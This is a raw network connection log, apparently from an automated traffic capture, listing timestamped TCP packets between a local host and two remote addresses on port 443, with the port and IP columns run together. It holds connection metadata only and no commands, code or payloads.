                                                                                                                                                  Nov 1, 2024 10:51:06.875721931 CET49796443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.875734091 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.875814915 CET49796443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.875952959 CET49796443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.875961065 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.933717966 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.934885979 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.934946060 CET49791443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.934971094 CET49791443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.934976101 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.934988976 CET49791443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.934993982 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.936630011 CET49797443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.936647892 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.936713934 CET49797443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.936811924 CET49797443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.936825037 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.938798904 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.939088106 CET49792443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.939115047 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.939495087 CET49792443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.939498901 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.061211109 CET44349793104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.061290979 CET49793443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:07.062340021 CET49793443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:07.062349081 CET44349793104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.062671900 CET44349793104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.063790083 CET49793443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:07.063822985 CET49793443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:07.063870907 CET44349793104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.067894936 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.067953110 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.068001032 CET49792443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.068092108 CET49792443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.068099976 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.068110943 CET49792443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.068114996 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.069839954 CET49798443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.069861889 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.069933891 CET49798443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.070038080 CET49798443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.070049047 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.354877949 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.355344057 CET49794443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.355354071 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.355772018 CET49794443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.355775118 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.427556992 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.427880049 CET49795443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.427895069 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.428246021 CET49795443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.428251028 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.483484030 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.483839989 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.484019041 CET49794443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.484019041 CET49794443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.484019041 CET49794443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.486263037 CET49799443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.486289024 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.486371994 CET49799443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.486498117 CET49799443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.486510038 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.534974098 CET44349793104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.535080910 CET44349793104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.535126925 CET49793443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:07.535291910 CET49793443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:07.535300970 CET44349793104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.535317898 CET49793443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:07.535321951 CET44349793104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.553823948 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.554160118 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.554215908 CET49795443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.554929972 CET49795443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.554946899 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.554955959 CET49795443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.554960966 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.565049887 CET49800443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.565076113 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.565150976 CET49800443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.565417051 CET49800443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.565431118 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.604357004 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.604711056 CET49796443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.604729891 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.605186939 CET49796443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.605190992 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.655744076 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.656040907 CET49797443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.656052113 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.656415939 CET49797443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.656420946 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.706535101 CET49794443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.706542969 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.733998060 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.734198093 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.734242916 CET49796443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.734345913 CET49796443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.734354019 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.734364033 CET49796443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.734369040 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.740437984 CET49801443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.740466118 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.740542889 CET49801443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.740885973 CET49801443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.740902901 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.783222914 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.783440113 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.783502102 CET49797443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.783530951 CET49797443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.783538103 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.783555031 CET49797443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.783559084 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.785451889 CET49802443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.785475016 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.785547972 CET49802443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.785675049 CET49802443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.785686970 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.810795069 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.811096907 CET49798443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.811105013 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.811499119 CET49798443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.811501980 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.941951036 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.942276001 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.942337990 CET49798443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.942373991 CET49798443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.942378998 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.942387104 CET49798443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.942389965 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.944668055 CET49803443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.944694996 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:07.944760084 CET49803443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.944889069 CET49803443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:07.944902897 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.214723110 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.217585087 CET49799443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.217601061 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.218020916 CET49799443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.218025923 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.306236982 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.308208942 CET49800443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.308221102 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.308649063 CET49800443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.308655024 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.355968952 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.356074095 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.356146097 CET49799443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.356297970 CET49799443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.356311083 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.356321096 CET49799443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.356324911 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.358555079 CET49804443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.358576059 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.358654976 CET49804443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.358778000 CET49804443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.358788013 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.437345028 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.437583923 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.437655926 CET49800443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.437768936 CET49800443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.437779903 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.437788963 CET49800443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.437793016 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.440007925 CET49805443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.440041065 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.440115929 CET49805443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.440218925 CET49805443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.440228939 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.470127106 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.473520994 CET49801443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.473530054 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.473910093 CET49801443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.473917961 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.513186932 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.513485909 CET49802443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.513503075 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.513855934 CET49802443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.513859034 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.642369986 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.642750025 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.642806053 CET49802443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.642832041 CET49802443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.642842054 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.642849922 CET49802443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.642853975 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.645226955 CET49806443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.645242929 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.645320892 CET49806443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.645464897 CET49806443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.645474911 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.678277016 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.678442955 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.678682089 CET49801443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.678759098 CET49801443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.678774118 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.678803921 CET49801443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.678812981 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.680740118 CET49807443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.680775881 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.680849075 CET49807443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.680946112 CET49807443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.680963039 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.681581974 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.681884050 CET49803443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.681891918 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.682286978 CET49803443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.682291985 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.815191984 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.816288948 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.816359997 CET49803443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.819281101 CET49803443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.819281101 CET49803443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.819294930 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.819302082 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.820985079 CET49808443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.821002007 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:08.821207047 CET49808443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.821347952 CET49808443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:08.821352959 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.259720087 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.260354042 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.261643887 CET49805443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.261662960 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.261816025 CET49804443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.261831045 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.262104034 CET49805443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.262109041 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.262262106 CET49804443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.262267113 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.377998114 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.378803015 CET49806443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.378812075 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.379223108 CET49806443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.379226923 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.387698889 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.388195992 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.388243914 CET49805443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.388266087 CET49805443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.388279915 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.388288021 CET49805443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.388293028 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.390285015 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.390918970 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.390989065 CET49804443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.391011953 CET49809443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.391031981 CET49804443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.391040087 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.391041994 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.391053915 CET49804443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.391057968 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.391119003 CET49809443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.391267061 CET49809443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.391278982 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.392920971 CET49810443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.392947912 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.393008947 CET49810443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.393112898 CET49810443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.393125057 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.413434982 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.413918018 CET49807443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.413933992 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.414330959 CET49807443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.414335966 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.508316994 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.508372068 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.508415937 CET49806443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.508516073 CET49806443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.508522987 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.508533001 CET49806443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.508538008 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.510479927 CET49811443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.510492086 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.510571003 CET49811443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.510684967 CET49811443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.510691881 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.543780088 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.544384956 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.544435024 CET49807443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.544459105 CET49807443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.544471025 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.544480085 CET49807443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.544485092 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.546430111 CET49812443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.546447039 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.546531916 CET49812443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.546715975 CET49812443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.546729088 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.561203003 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.561511040 CET49808443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.561520100 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.561887026 CET49808443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.561891079 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.708252907 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.708300114 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.708385944 CET49808443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.708653927 CET49808443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.708667040 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.708678007 CET49808443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.708683014 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.711242914 CET49813443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.711262941 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.711340904 CET49813443192.168.2.413.107.246.45
